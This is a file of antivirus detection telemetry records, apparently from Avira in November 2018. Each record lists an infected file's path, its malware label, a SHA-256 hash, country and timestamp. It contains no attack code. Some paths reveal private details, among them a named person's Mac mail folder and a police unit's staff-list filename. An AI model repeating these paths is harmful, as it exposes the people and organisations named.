  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T15:41:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050655-16e13717', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050655-16E13717', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:06:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052537-b327d89c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052537-B327D89C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:25:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062612-2a3dd31e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062612-2A3DD31E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:26:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='HEUR/AGEN.1033682.#M1.#R1'), hash='3be2712f73c464f000dea362560c73d29201059849979f83f557fe1fe735af50', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T02:14:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='53bab36cf78ed5d01820e0c053933882bf0353fd4e874d787db6db3790e1053b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T14:52:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-01-07-08-23.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-22T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-01T22:19:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155548-bfcc6f86', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155548-BFCC6F86', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:55:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ktfdrm_ucc.dll', filepath='C:\\Program Files (x86)\\Samsung\\Samsung New PC Studio\\KTFDRM_UCC.dll', filesize=512000, name='W32/Nimnul.D.#M1.#R1'), hash='0479b46fd31c057040a06223d37efe907f1440979dd465e2fbd8bed6d374e803', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T07:08:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155526-bc1e8a52', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155526-BC1E8A52', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:55:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-143313-7d321f26', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-142842-4F9964B3\\AVSCAN-20181101-143313-7D321F26', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:33:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T14:49:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-080104-5bf0c8cf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a301630a\\AVSCAN-20181101-080045-593A3C3A\\AVSCAN-20181101-080104-5BF0C8CF', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T01:01:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='166332716931094.exe', filepath='\\\\?\\C:\\Temp\\166332716931094.exe', filesize=192000, name='HEUR/AGEN.1031796.#M1.#R1'), hash='1b2ca8ba39cc650a806f78ce129d98467ab7823b2201d8272be48beb3d5c4849', metadata=Row(cmdline=None, country='BY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:14:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-01-11-52-10.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-28T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-01T13:02:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='danh sách cán bộ chiến sĩ đội csđt.exe', filepath='H:\\\xa0\\Chuyen an ĐB718\\DANH SÁCH CÁN BỘ CHIẾN SĨ ĐỘI CSĐT.exe', filesize=1664000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='2746d627a74abb289fe81c0d6089d3ba15a83f056059d2030f5a76ec124a69db', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-01T08:30:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='precios.exe', filepath='C:\\EF3SRV\\Comunes\\SP15 - Club SAAS - SUNDECOP\\Club SAAS\\precios.exe', filesize=128000, name='W32/Alman.BB.#M1.#R1'), hash='27bc6957e7abb56f40bc3edb75c63a92f5ff913060e4d64a5acd538e66caa650', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe347_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe347 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T03:07:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='order #5011-b6109 .xls', filepath='/Volumes/com.apple.TimeMachine.localsnapshots/Backups.backupdb/Barbara Teicher’s MacBook Pro/2018-11-01-161957/Macintosh HD/Users/barbarateicher/Library/Mail/V5/017C0CDF-3ADE-49D5-9BB4-DABDD062563F/INBOX.mbox/02CD974B-2FEB-43A6-88AA-5618AA763798/Data/8/4/0/1/Attachments/1048902/2/Order #5011-B6109 .xls', filesize=64000, name='X97M/Agent.76545964.#M0.#R0'), hash='039949bfb477668fd4b8397c1bf8593d4e4d6ea4eda54d7da86c2f1e449e4351', metadata=Row(cmdline=None, country='US', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T21:26:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dwh9f60', filepath='C:\\ProgramData\\Symantec\\DefWatch.DWH\\DWH9F60', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline='\\\\\\/s \\\\\\"Symantec Endpoint Protection\\\\\\" \\\\\\/m \\\\\\"C:\\\\\\\\Program Files\\\\\\\\Symantec\\\\\\\\Symantec Endpoint Protection\\\\\\\\12.1.4100.4126.105\\\\\\\\Bin\\\\\\\\sms.dll\\\\\\" \\\\\\/prefetch:1', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Symantec\\Symantec Endpoint Protection\\12.1.4100.4126.105\\Bin\\ccSvcHst.exe', parentsize=144496, timestamp='2018-11-01T09:41:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0076482.exe', filepath='h:\\system volume information\\_restore{7c131188-5303-4a72-8ded-6be12a1b82b9}\\rp16\\A0076482.exe', filesize=512000, name='W32/Sality.AT.#M1.#R1'), hash='1c79d4565b271605f1974e2626eb5cd3c6c8ae5091b3d1b89b0e29a82c5ae12a', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:23:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-154632-6230aa26', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-154632-6230AA26', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:46:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='new folder .exe', filepath='\\?\\J:\\العاب\\Beetle.Bug.3\\New folder\\New folder .exe', filesize=832000, name='W32/Virut.Gen.#M1.#R1'), hash='139c0548d7d0472df6622ff2c7e02107e9d84e892c0e031392c4e48b23d6319b', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:45:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ophcrack.exe', filepath='K:\\HBCD\\Programs\\OPHCrack.exe', filesize=64000, name='TR/Agent.64000.101.#M1.#R1'), hash='28d02d53172d5486e395b7cc2768e91b922defe83fe554f97d652a3879527a70', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='K:\\HBCD\\PStart.exe', parentsize=786952, timestamp='2018-11-01T17:01:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\aswidsagent.exe', parentsize=6800144, timestamp='2018-11-01T21:08:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='45be2bb7883b7e635f1fcb40fb787f9371fd06d1ef5be60c485f05591cbe178d', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-01T11:26:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='audiodg.exe', filepath='\\\\?\\C:\\Windows\\system32\\AUDIODG.EXE', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='3f9b769c3eb222b0fd5c794b17acd464baf795424535f5c71374bbf36ce928fb', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:34:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='uninstall.exe', filepath='C:\\Program Files\\AIMP3\\Uninstall.exe', filesize=3556000, name='W32/Sality.AT.#M1.#R1'), hash='df7ff6ae01d1698a7ebaa94816afc7ce19b02c508280757459d6779097bb5443', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T19:00:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\nsbFE42.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:38:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='75bf7f16516cb1f587963c9d4c51830e7c063398affeb0a8cef3c3d6a61dda67', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-31\\75BF7F16516CB1F587963C9D4C51830E7C063398AFFEB0A8CEF3C3D6A61DDA67', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='75bf7f16516cb1f587963c9d4c51830e7c063398affeb0a8cef3c3d6a61dda67', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:06:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='nvwgf2um.dll', filepath='C:\\Windows\\System32\\nvwgf2um.dll', filesize=192000, name='HEUR/AGEN.1011092.#M1.#R1'), hash='e688b6f02cb57bab9845107aa3b6ad35355f34e9ade2a55388aba9cdd1dbffa3', metadata=Row(cmdline=None, country='BG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T14:18:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='apxkxtyquoc.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nsaC3AD.tmp\\apXKXtYQUOC.dll', filesize=1152000, name='Adware/Zdengo.jplev.#M1.#R1'), hash='abd0bce4329be3cb4cdd15f863c7d30f3477d1f45065c27c9384482a6ae87134', metadata=Row(cmdline='-r', country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Kaspersky Lab\\Kaspersky Total Security 19.0.0\\avp.exe', parentsize=619640, timestamp='2018-11-01T09:28:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='76qn6rort.vir', filepath='\\\\?\\C:\\Program Files\\76QN6RORTL\\76QN6RORT.VIR', filesize=832000, name='TR/Dropper.Gen.#M300.#R4133'), hash='733e354c150b4149737ae67afd29dc8e971759219779881f1f0375c6118fb5b9', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T00:20:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='g_isdel.exe', filepath='\\\\?\\D:\\3 GIS\\@د- سحر سالم @\\د-سحر المنهج\\Arc GIS\\ArcGIS I Data\\cleanup\\g_ISDel.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='b82db8cb554244cba2d424b9da8e36f8281a2443ad6b9ac55e017d2b147f0bfa', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T13:20:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='com.google.android.googlequicksearchbox.exe', filepath='G:\\Android\\data\\com.google.android.googlequicksearchbox.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='e9238eb4cc2a0e45a4ecca77c7477cc3a19b6954cc0ca545537f1325ece125fc', metadata=Row(cmdline=None, country='CI', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc='C:\\Windows\\explorer.exe', parentsize=2106176, timestamp='2018-11-01T11:54:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110226-b9fe49d5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-110226-B9FE49D5', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:02:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='adobepsl.dll', filepath='C:\\Program Files\\Adobe\\Adobe Fireworks CS3\\AdobePSL.dll', filesize=12288000, name='W32/Ramnit.CD.#M1.#R1'), hash='82e76e2a6dddf63c384c2be32373c2513e87437a207f47100dc66ed6a54ed3c2', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Internet Explorer\\iexplore.exe', parentsize=818784, timestamp='2018-11-01T12:59:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='adobeols.dll', filepath='C:\\Program Files\\Adobe\\Adobe Bridge\\AdobeOLS.dll', filesize=1024000, name='W32/Ramnit.CD.#M1.#R1'), hash='a87c84467a8b0b893ffa40cc6dd3de2bfd1b1a3423b346a57253e5790d889bac', metadata=Row(cmdline=None, country='BY', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:49:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ifversion.dll', filepath='C:\\Program Files (x86)\\AspenTech\\Aspen HYSYS V7.1\\IFVersion.dll', filesize=192000, name='W32/Ramnit.CD.#M1.#R1'), hash='6b41dc28bde442c5d161a7ddab28ca8f2b6fb75c507020de2926662ec11a21f1', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T21:19:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-141052-e7224d2f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a0197bd9\\AVSCAN-20181101-140354-BD0DC590\\AVSCAN-20181101-141052-E7224D2F', filesize=892000, name='ADWARE/Spigot.892000.#M1.#R1'), hash='9559dc925a2a572eeeff7b5d42e1aabe49cc80f1b149b4d09d9acd8e801ff827', metadata=Row(cmdline=None, country='GR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:10:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-121741-547d2f90', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_dda9b780\\AVSCAN-20181101-121710-39A1966B\\AVSCAN-20181101-121741-547D2F90', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T04:17:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ntbootautofix.exe', filepath='K:\\HBCD\\Programs\\NTBOOTAUTOFIX.EXE', filesize=64000, name='TR/Agent.64000.118.#M1.#R1'), hash='881c0e605130cfd9eca8ca14e5402a53a6b365a579221d829f5d80cd7447bb51', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='K:\\HBCD\\PStart.exe', parentsize=786952, timestamp='2018-11-01T17:01:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup.exe', filepath='C:\\Users\\X\\Downloads\\Files\\Setup.exe', filesize=55424000, name='HEUR/AGEN.1032309.#M1.#R1'), hash='aa681078e0e7772a97f51dacaf6e880ae82f39b1979b302e90aff452ebac2f73', metadata=Row(cmdline=None, country='CO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=4312752, timestamp='2018-11-01T00:04:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='GB', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe', parentsize=1589080, timestamp='2018-11-01T22:19:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-162810-2489a017', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ed6d7824\\AVSCAN-20181101-155643-3A4A76A5\\AVSCAN-20181101-162810-2489A017', filesize=720000, name='PUA/InstallCore.Gen.#M300.#R5961'), hash='74fb2bad874b16fb119d834b293792f4bc05496ff67c28be623ac5d0d82f7aec', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:28:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-142914-2534842d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0916e0be\\AVSCAN-20181101-142705-187CF917\\AVSCAN-20181101-142914-2534842D', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:29:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\VFP98\\DISTRIB.SRC\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='ba1c1ec10f7445b80823c5e7eda2842be32aa364630bc4aa3495259d5b04f012', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T01:05:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='keygen.exe', filepath='F:\\نرم افزار\\Jaws PDF Creator 5.0.3496(www.Downloadha.com)\\Jaws PDF Creator 5.0.3496\\keygen.exe', filesize=256000, name='TR/Spy.256000.14.#M1.#R1'), hash='eed5e6c5ff334377863015b6ba806eff44e32fb10f37cda4cffd5e7a5bc0cc0d', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T05:51:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-085258-8dbe7075', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c9a063d9\\AVSCAN-20181031-205810-8E73B4A7\\AVSCAN-20181101-085258-8DBE7075', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T07:48:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-152739-83e406a4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7c64377b\\AVSCAN-20181101-152726-820818A3\\AVSCAN-20181101-152739-83E406A4', filesize=512000, name='TR/Crypt.ZPACK.Gen2.100871.#M1.#R1'), hash='5d15c8a10de097152559adebf4acac95b4b9b6fbc2fe0670157a1d57b05e38d9', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T14:27:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EX00.051\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='LB', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EX00.051\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T17:44:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T12:25:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ab2a7667-a4fe-cead-8c6a-b35c37acbb3e.exe', filepath='E:\\{d61767d8-d3f8-abe5-ca31-d92558eba4a7}\\ab2a7667-a4fe-cead-8c6a-b35c37acbb3e.exe', filesize=256000, name='TR/Dropper.Gen.#M300.#R4148'), hash='4ef0a023932d5f073dd817ae3a7b569f22edbed4afc4e6728f7dcc5884584283', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-01T02:51:34Z'), dt=datetime.date(2018, 11, 1)),
